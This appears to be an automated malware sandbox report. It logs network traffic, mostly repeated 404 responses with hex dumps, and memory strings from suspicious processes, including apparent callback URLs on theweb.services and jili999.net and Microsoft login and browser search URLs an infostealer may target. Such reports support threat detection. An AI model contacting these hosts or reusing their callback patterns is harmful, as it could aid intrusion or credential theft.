68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta c
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 17 Feb 2025 12:50:26 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7PiRjhyQN8x8wtbgJZYCQXz%2FVREQAOeLMRVhQI%2B2NCodzReCMDRrAVkReAQX7AUmx%2Fat4kl%2BOBUCOsQzNt7MtodOBRBaImm2AWNgWyLcLkd6mjOX27L6e9QkK7mbkchJw6g%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9135e72c8d1343e2-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1753&min_rtt=1753&rtt_var=876&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=693&delivery_rate=0&cwnd=217&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 70 d9 24 e5 a7 54 da 71 d9 24 a7 e6 95 a4 16 d9 d9 64 18 a2 ab cf 30 b4 b3 d1 87 4a 73 d9 64 14 d9 c1 d4 e6 a5 67 e6 55 20 49 e9 43 8d d2 07 bb 01 00 ad 72 6b 8d 8a 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6d(HML),I310Q/Qp/Kp$Tq$d0JsdgU ICrk0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 17 Feb 2025 12:50:26 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7PiRjhyQN8x8wtbgJZYCQXz%2FVREQAOeLMRVhQI%2B2NCodzReCMDRrAVkReAQX7AUmx%2Fat4kl%2BOBUCOsQzNt7MtodOBRBaImm2AWNgWyLcLkd6mjOX27L6e9QkK7mbkchJw6g%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9135e72c8d1343e2-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1753&min_rtt=1753&rtt_var=876&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=693&delivery_rate=0&cwnd=217&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 70 d9 24 e5 a7 54 da 71 d9 24 a7 e6 95 a4 16 d9 d9 64 18 a2 ab cf 30 b4 b3 d1 87 4a 73 d9 64 14 d9 c1 d4 e6 a5 67 e6 55 20 49 e9 43 8d d2 07 bb 01 00 ad 72 6b 8d 8a 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6d(HML),I310Q/Qp/Kp$Tq$d0JsdgU ICrk0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 17 Feb 2025 12:50:26 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7PiRjhyQN8x8wtbgJZYCQXz%2FVREQAOeLMRVhQI%2B2NCodzReCMDRrAVkReAQX7AUmx%2Fat4kl%2BOBUCOsQzNt7MtodOBRBaImm2AWNgWyLcLkd6mjOX27L6e9QkK7mbkchJw6g%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9135e72c8d1343e2-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1753&min_rtt=1753&rtt_var=876&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=693&delivery_rate=0&cwnd=217&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 70 d9 24 e5 a7 54 da 71 d9 24 a7 e6 95 a4 16 d9 d9 64 18 a2 ab cf 30 b4 b3 d1 87 4a 73 d9 64 14 d9 c1 d4 e6 a5 67 e6 55 20 49 e9 43 8d d2 07 bb 01 00 ad 72 6b 8d 8a 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6d(HML),I310Q/Qp/Kp$Tq$d0JsdgU ICrk0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 17 Feb 2025 12:50:37 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 17 Feb 2025 12:50:39 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 17 Feb 2025 12:50:42 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 17 Feb 2025 12:50:44 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closex-litespeed-tag: 6d9_HTTP.404content-type: text/html; charset=UTF-8link: <https://theweb.services/wp-json/>; rel="https://api.w.org/"x-tec-api-version: v1x-tec-api-root: https://theweb.services/wp-json/tribe/events/v1/x-tec-api-origin: https://theweb.servicesexpires: Wed, 11 Jan 1984 05:00:00 GMTx-litespeed-cache-control: no-cachecache-control: no-cache, no-store, must-revalidate, max-age=0content-length: 1798content-encoding: brvary: Accept-Encodingdate: Mon, 17 Feb 2025 12:51:12 GMTserver: LiteSpeedData Raw: 02 dc 02 80 fc af 4b ab 86 a6 fa d1 1c 6e 10 08 3b 27 01 ed 7d 57 71 1e 4f c0 07 fe 58 48 5a 49 f8 48 66 ca 62 9b 76 ef 5b 7b 7d 9e 84 8d 70 51 22 c6 46 b8 08 bb b3 b3 c1 bb 00 62 09 67 e7 f6 42 cc ae 0c b2 b2 46 13 29 20 27 7f 95 ab ac 30 b2 36 86 7b 3e 7e a6 8a 88 08 87 2f d8 66 02 02 4e 96 69 3d c7 45 1f bd ea ea 0d 43 c3 ff f9 eb 31 0e 7a a6 c5 8b fb 59 f9 80 b1 61 33 6f a5 b3 7b d1 5f 14 11 28 c0 21 91 ae 3a 59 32 13 0c 81 64 1c fb 6c 49 ad c9 1c c0 a3 6e 18 f5 d6 dc 22 71 ad 50 15 45 9c f1 84 5d fe f8 89 51 c5 c9 f1 e7 9d 7f 9e c5 ea b4 55 43 28 b6 62 7b 5d 94 65 71 24 4f 03 29 13 39 f5 96 97 37 e2 5c de 88 fc 84 9d cb 32 77 56 68 d8 6e 7b de 6d 39 f5 c8 ae 83 b4 13 e2 bc 13 eb 2e 1f b6 e7 f2 e1 d3 7f ab 72 4e 23 8f 76 ed 67 ce 08 a7 11 6d 96 f0 f0 8f 17 e1 7f 93 c6 1f 16 35 21 53 18 0f e3 a1 4e f2 01 0d 08 ed 15 9f 59 bf 4e a3 8e 56 66 02 5e 80 87 5e 69 6c ca 0c b2 01 90 ff ec b3 90 a9 55 1f eb cb 40 a5 6b 31 96 5e eb 1c a3 e3 f8 ef 4a c7 86 ad 0a d9 88 0e 42 5f a3 8e ab e6 50 be c4 a8 80 03 fb 21 56 07 a5 ef 62 9d 98 51 62 cc 5c 13 7f 69 d5 7b f5 ba e7 09 e6 18 9d 9e 1b b5 37 10 a5 58 e1 e8 2c 94 05 79 06 08 d6 9a 1c fe 9e 95 39 c0 c5 ae 30 5a 0f 17 bb 7a 48 3d 99 d2 e3 15 9b da ca 5f cb 79 3b 92 c6 2f 4f 50 15 c5 b4 b8 29 b7 7e 2a ce a3 29 ca 72 22 68 cb f5 91 99 3a d5 1f 3e b0 26 e3 15 9e 17 ed 5d 9f bb d9 51 79 c4 4d 88 17 8d 61 46 8c 1b a0 a1 d9 2c d1 f4 bc a0 94 f7 21 6c d6 63 63 36 b4 a9 29 42 07 42 27 6f b7 42 5b 35 14 7d 08 28 e2 e3 3e 3b a2 6f ca bb dd 7d 79 bd 15 e5 c3 06 ce f6 72 9e 8d d2 7a 63 1a 0c 98 fb 57 46 6b 62 78 11 34 dd bf 0a 96 1a 01 fb 44 1b 91 9d 1d 2e f0 ba 75 94 02 6f ca df de e4 4f b9 f3 a8 ad 1a d0 d7 04 4a 9a f3 f9 8d f0 9b 43 03 7f 29 13 1e e1 53 1e 28 22 8f 14 35 66 40 f5 23 29 83 5c db 89 0c 1f ad 5f fe e3 8b 83 ca b5 0d 91 3b 15 42 06 79 17 0d b7 0e 0d 6f 22 48 4b 51 9d 98 41 be 06 f4 92 53 8f 13 e4 8a 12 32 48 b5 d1 3b 83 7c 91 a6 83 7a 1d 54 d8 f8 db 9c c7 4f a0 f2 13 06 a9 87 53 b8 d5 9b 45 91 Data Ascii: Kn;'}WqOXHZIHfbv[{}pQ"FbgBF) '06{>~/fNi=EC1zYa3o{_(!:Y2dlIn"qPE]QUC(b{]eq$O)97\2wVhn{m9.rN#vgm5!SNYNVf^^ilU@k1^JB_P!VbQb\i{7X,y90ZzH=_y;/OP)~*)r"h
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closex-litespeed-tag: 6d9_HTTP.404content-type: text/html; charset=UTF-8link: <https://theweb.services/wp-json/>; rel="https://api.w.org/"x-tec-api-version: v1x-tec-api-root: https://theweb.services/wp-json/tribe/events/v1/x-tec-api-origin: https://theweb.servicesexpires: Wed, 11 Jan 1984 05:00:00 GMTx-litespeed-cache-control: no-cachecache-control: no-cache, no-store, must-revalidate, max-age=0content-length: 1798content-encoding: brvary: Accept-Encodingdate: Mon, 17 Feb 2025 12:51:14 GMTserver: LiteSpeedData Raw: 02 dc 02 80 fc af 4b ab 86 a6 fa d1 1c 6e 10 08 3b 27 01 ed 7d 57 71 1e 4f c0 07 fe 58 48 5a 49 f8 48 66 ca 62 9b 76 ef 5b 7b 7d 9e 84 8d 70 51 22 c6 46 b8 08 bb b3 b3 c1 bb 00 62 09 67 e7 f6 42 cc ae 0c b2 b2 46 13 29 20 27 7f 95 ab ac 30 b2 36 86 7b 3e 7e a6 8a 88 08 87 2f d8 66 02 02 4e 96 69 3d c7 45 1f bd ea ea 0d 43 c3 ff f9 eb 31 0e 7a a6 c5 8b fb 59 f9 80 b1 61 33 6f a5 b3 7b d1 5f 14 11 28 c0 21 91 ae 3a 59 32 13 0c 81 64 1c fb 6c 49 ad c9 1c c0 a3 6e 18 f5 d6 dc 22 71 ad 50 15 45 9c f1 84 5d fe f8 89 51 c5 c9 f1 e7 9d 7f 9e c5 ea b4 55 43 28 b6 62 7b 5d 94 65 71 24 4f 03 29 13 39 f5 96 97 37 e2 5c de 88 fc 84 9d cb 32 77 56 68 d8 6e 7b de 6d 39 f5 c8 ae 83 b4 13 e2 bc 13 eb 2e 1f b6 e7 f2 e1 d3 7f ab 72 4e 23 8f 76 ed 67 ce 08 a7 11 6d 96 f0 f0 8f 17 e1 7f 93 c6 1f 16 35 21 53 18 0f e3 a1 4e f2 01 0d 08 ed 15 9f 59 bf 4e a3 8e 56 66 02 5e 80 87 5e 69 6c ca 0c b2 01 90 ff ec b3 90 a9 55 1f eb cb 40 a5 6b 31 96 5e eb 1c a3 e3 f8 ef 4a c7 86 ad 0a d9 88 0e 42 5f a3 8e ab e6 50 be c4 a8 80 03 fb 21 56 07 a5 ef 62 9d 98 51 62 cc 5c 13 7f 69 d5 7b f5 ba e7 09 e6 18 9d 9e 1b b5 37 10 a5 58 e1 e8 2c 94 05 79 06 08 d6 9a 1c fe 9e 95 39 c0 c5 ae 30 5a 0f 17 bb 7a 48 3d 99 d2 e3 15 9b da ca 5f cb 79 3b 92 c6 2f 4f 50 15 c5 b4 b8 29 b7 7e 2a ce a3 29 ca 72 22 68 cb f5 91 99 3a d5 1f 3e b0 26 e3 15 9e 17 ed 5d 9f bb d9 51 79 c4 4d 88 17 8d 61 46 8c 1b a0 a1 d9 2c d1 f4 bc a0 94 f7 21 6c d6 63 63 36 b4 a9 29 42 07 42 27 6f b7 42 5b 35 14 7d 08 28 e2 e3 3e 3b a2 6f ca bb dd 7d 79 bd 15 e5 c3 06 ce f6 72 9e 8d d2 7a 63 1a 0c 98 fb 57 46 6b 62 78 11 34 dd bf 0a 96 1a 01 fb 44 1b 91 9d 1d 2e f0 ba 75 94 02 6f ca df de e4 4f b9 f3 a8 ad 1a d0 d7 04 4a 9a f3 f9 8d f0 9b 43 03 7f 29 13 1e e1 53 1e 28 22 8f 14 35 66 40 f5 23 29 83 5c db 89 0c 1f ad 5f fe e3 8b 83 ca b5 0d 91 3b 15 42 06 79 17 0d b7 0e 0d 6f 22 48 4b 51 9d 98 41 be 06 f4 92 53 8f 13 e4 8a 12 32 48 b5 d1 3b 83 7c 91 a6 83 7a 1d 54 d8 f8 db 9c c7 4f a0 f2 13 06 a9 87 53 b8 d5 9b 45 91 Data Ascii: Kn;'}WqOXHZIHfbv[{}pQ"FbgBF) '06{>~/fNi=EC1zYa3o{_(!:Y2dlIn"qPE]QUC(b{]eq$O)97\2wVhn{m9.rN#vgm5!SNYNVf^^ilU@k1^JB_P!VbQb\i{7X,y90ZzH=_y;/OP)~*)r"h
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closex-litespeed-tag: 6d9_HTTP.404content-type: text/html; charset=UTF-8link: <https://theweb.services/wp-json/>; rel="https://api.w.org/"x-tec-api-version: v1x-tec-api-root: https://theweb.services/wp-json/tribe/events/v1/x-tec-api-origin: https://theweb.servicesexpires: Wed, 11 Jan 1984 05:00:00 GMTx-litespeed-cache-control: no-cachecache-control: no-cache, no-store, must-revalidate, max-age=0content-length: 1798content-encoding: brvary: Accept-Encodingdate: Mon, 17 Feb 2025 12:51:17 GMTserver: LiteSpeedData Raw: 02 dc 02 80 fc af 4b ab 86 a6 fa d1 1c 6e 10 08 3b 27 01 ed 7d 57 71 1e 4f c0 07 fe 58 48 5a 49 f8 48 66 ca 62 9b 76 ef 5b 7b 7d 9e 84 8d 70 51 22 c6 46 b8 08 bb b3 b3 c1 bb 00 62 09 67 e7 f6 42 cc ae 0c b2 b2 46 13 29 20 27 7f 95 ab ac 30 b2 36 86 7b 3e 7e a6 8a 88 08 87 2f d8 66 02 02 4e 96 69 3d c7 45 1f bd ea ea 0d 43 c3 ff f9 eb 31 0e 7a a6 c5 8b fb 59 f9 80 b1 61 33 6f a5 b3 7b d1 5f 14 11 28 c0 21 91 ae 3a 59 32 13 0c 81 64 1c fb 6c 49 ad c9 1c c0 a3 6e 18 f5 d6 dc 22 71 ad 50 15 45 9c f1 84 5d fe f8 89 51 c5 c9 f1 e7 9d 7f 9e c5 ea b4 55 43 28 b6 62 7b 5d 94 65 71 24 4f 03 29 13 39 f5 96 97 37 e2 5c de 88 fc 84 9d cb 32 77 56 68 d8 6e 7b de 6d 39 f5 c8 ae 83 b4 13 e2 bc 13 eb 2e 1f b6 e7 f2 e1 d3 7f ab 72 4e 23 8f 76 ed 67 ce 08 a7 11 6d 96 f0 f0 8f 17 e1 7f 93 c6 1f 16 35 21 53 18 0f e3 a1 4e f2 01 0d 08 ed 15 9f 59 bf 4e a3 8e 56 66 02 5e 80 87 5e 69 6c ca 0c b2 01 90 ff ec b3 90 a9 55 1f eb cb 40 a5 6b 31 96 5e eb 1c a3 e3 f8 ef 4a c7 86 ad 0a d9 88 0e 42 5f a3 8e ab e6 50 be c4 a8 80 03 fb 21 56 07 a5 ef 62 9d 98 51 62 cc 5c 13 7f 69 d5 7b f5 ba e7 09 e6 18 9d 9e 1b b5 37 10 a5 58 e1 e8 2c 94 05 79 06 08 d6 9a 1c fe 9e 95 39 c0 c5 ae 30 5a 0f 17 bb 7a 48 3d 99 d2 e3 15 9b da ca 5f cb 79 3b 92 c6 2f 4f 50 15 c5 b4 b8 29 b7 7e 2a ce a3 29 ca 72 22 68 cb f5 91 99 3a d5 1f 3e b0 26 e3 15 9e 17 ed 5d 9f bb d9 51 79 c4 4d 88 17 8d 61 46 8c 1b a0 a1 d9 2c d1 f4 bc a0 94 f7 21 6c d6 63 63 36 b4 a9 29 42 07 42 27 6f b7 42 5b 35 14 7d 08 28 e2 e3 3e 3b a2 6f ca bb dd 7d 79 bd 15 e5 c3 06 ce f6 72 9e 8d d2 7a 63 1a 0c 98 fb 57 46 6b 62 78 11 34 dd bf 0a 96 1a 01 fb 44 1b 91 9d 1d 2e f0 ba 75 94 02 6f ca df de e4 4f b9 f3 a8 ad 1a d0 d7 04 4a 9a f3 f9 8d f0 9b 43 03 7f 29 13 1e e1 53 1e 28 22 8f 14 35 66 40 f5 23 29 83 5c db 89 0c 1f ad 5f fe e3 8b 83 ca b5 0d 91 3b 15 42 06 79 17 0d b7 0e 0d 6f 22 48 4b 51 9d 98 41 be 06 f4 92 53 8f 13 e4 8a 12 32 48 b5 d1 3b 83 7c 91 a6 83 7a 1d 54 d8 f8 db 9c c7 4f a0 f2 13 06 a9 87 53 b8 d5 9b 45 91 Data Ascii: Kn;'}WqOXHZIHfbv[{}pQ"FbgBF) '06{>~/fNi=EC1zYa3o{_(!:Y2dlIn"qPE]QUC(b{]eq$O)97\2wVhn{m9.rN#vgm5!SNYNVf^^ilU@k1^JB_P!VbQb\i{7X,y90ZzH=_y;/OP)~*)r"h

Source: fVnaqDZrZDB.exe, 00000009.00000002.3899772190.0000000004B52000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.theweb.services
Source: fVnaqDZrZDB.exe, 00000009.00000002.3899772190.0000000004B52000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.theweb.services/7t9z/
Source: secinit.exe, 00000006.00000002.3902446621.00000000080D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: secinit.exe, 00000006.00000002.3902446621.00000000080D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: secinit.exe, 00000006.00000002.3902446621.00000000080D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: secinit.exe, 00000006.00000002.3902446621.00000000080D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: secinit.exe, 00000006.00000002.3902446621.00000000080D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: secinit.exe, 00000006.00000002.3902446621.00000000080D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: secinit.exe, 00000006.00000002.3902446621.00000000080D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: secinit.exe, 00000006.00000002.3900057662.0000000004D24000.00000004.10000000.00040000.00000000.sdmp, secinit.exe, 00000006.00000002.3902108940.0000000006520000.00000004.00000800.00020000.00000000.sdmp, fVnaqDZrZDB.exe, 00000009.00000002.3897689774.0000000003744000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://fonts.googleapis.com/css2?family=Jost:ital
Source: secinit.exe, 00000006.00000002.3900057662.0000000004A00000.00000004.10000000.00040000.00000000.sdmp, fVnaqDZrZDB.exe, 00000009.00000002.3897689774.0000000003420000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://jili999.net/uh6l/?v0vHVXch=Mn5nmS7lt2cJv9
Source: secinit.exe, 00000006.00000002.3893050955.000000000317B000.00000004.00000020.00020000.00000000.sdmp, secinit.exe, 00000006.00000002.3893050955.0000000003152000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: secinit.exe, 00000006.00000002.3893050955.0000000003152000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: secinit.exe, 00000006.00000003.2011592139.000000000800C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
Source: secinit.exe, 00000006.00000002.3893050955.0000000003152000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: secinit.exe, 00000006.00000002.3893050955.000000000317B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033LMEM
Source: secinit.exe, 00000006.00000002.3893050955.0000000003152000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
Source: secinit.exe, 00000006.00000002.3893050955.0000000003152000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: secinit.exe, 00000006.00000002.3893050955.0000000003152000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
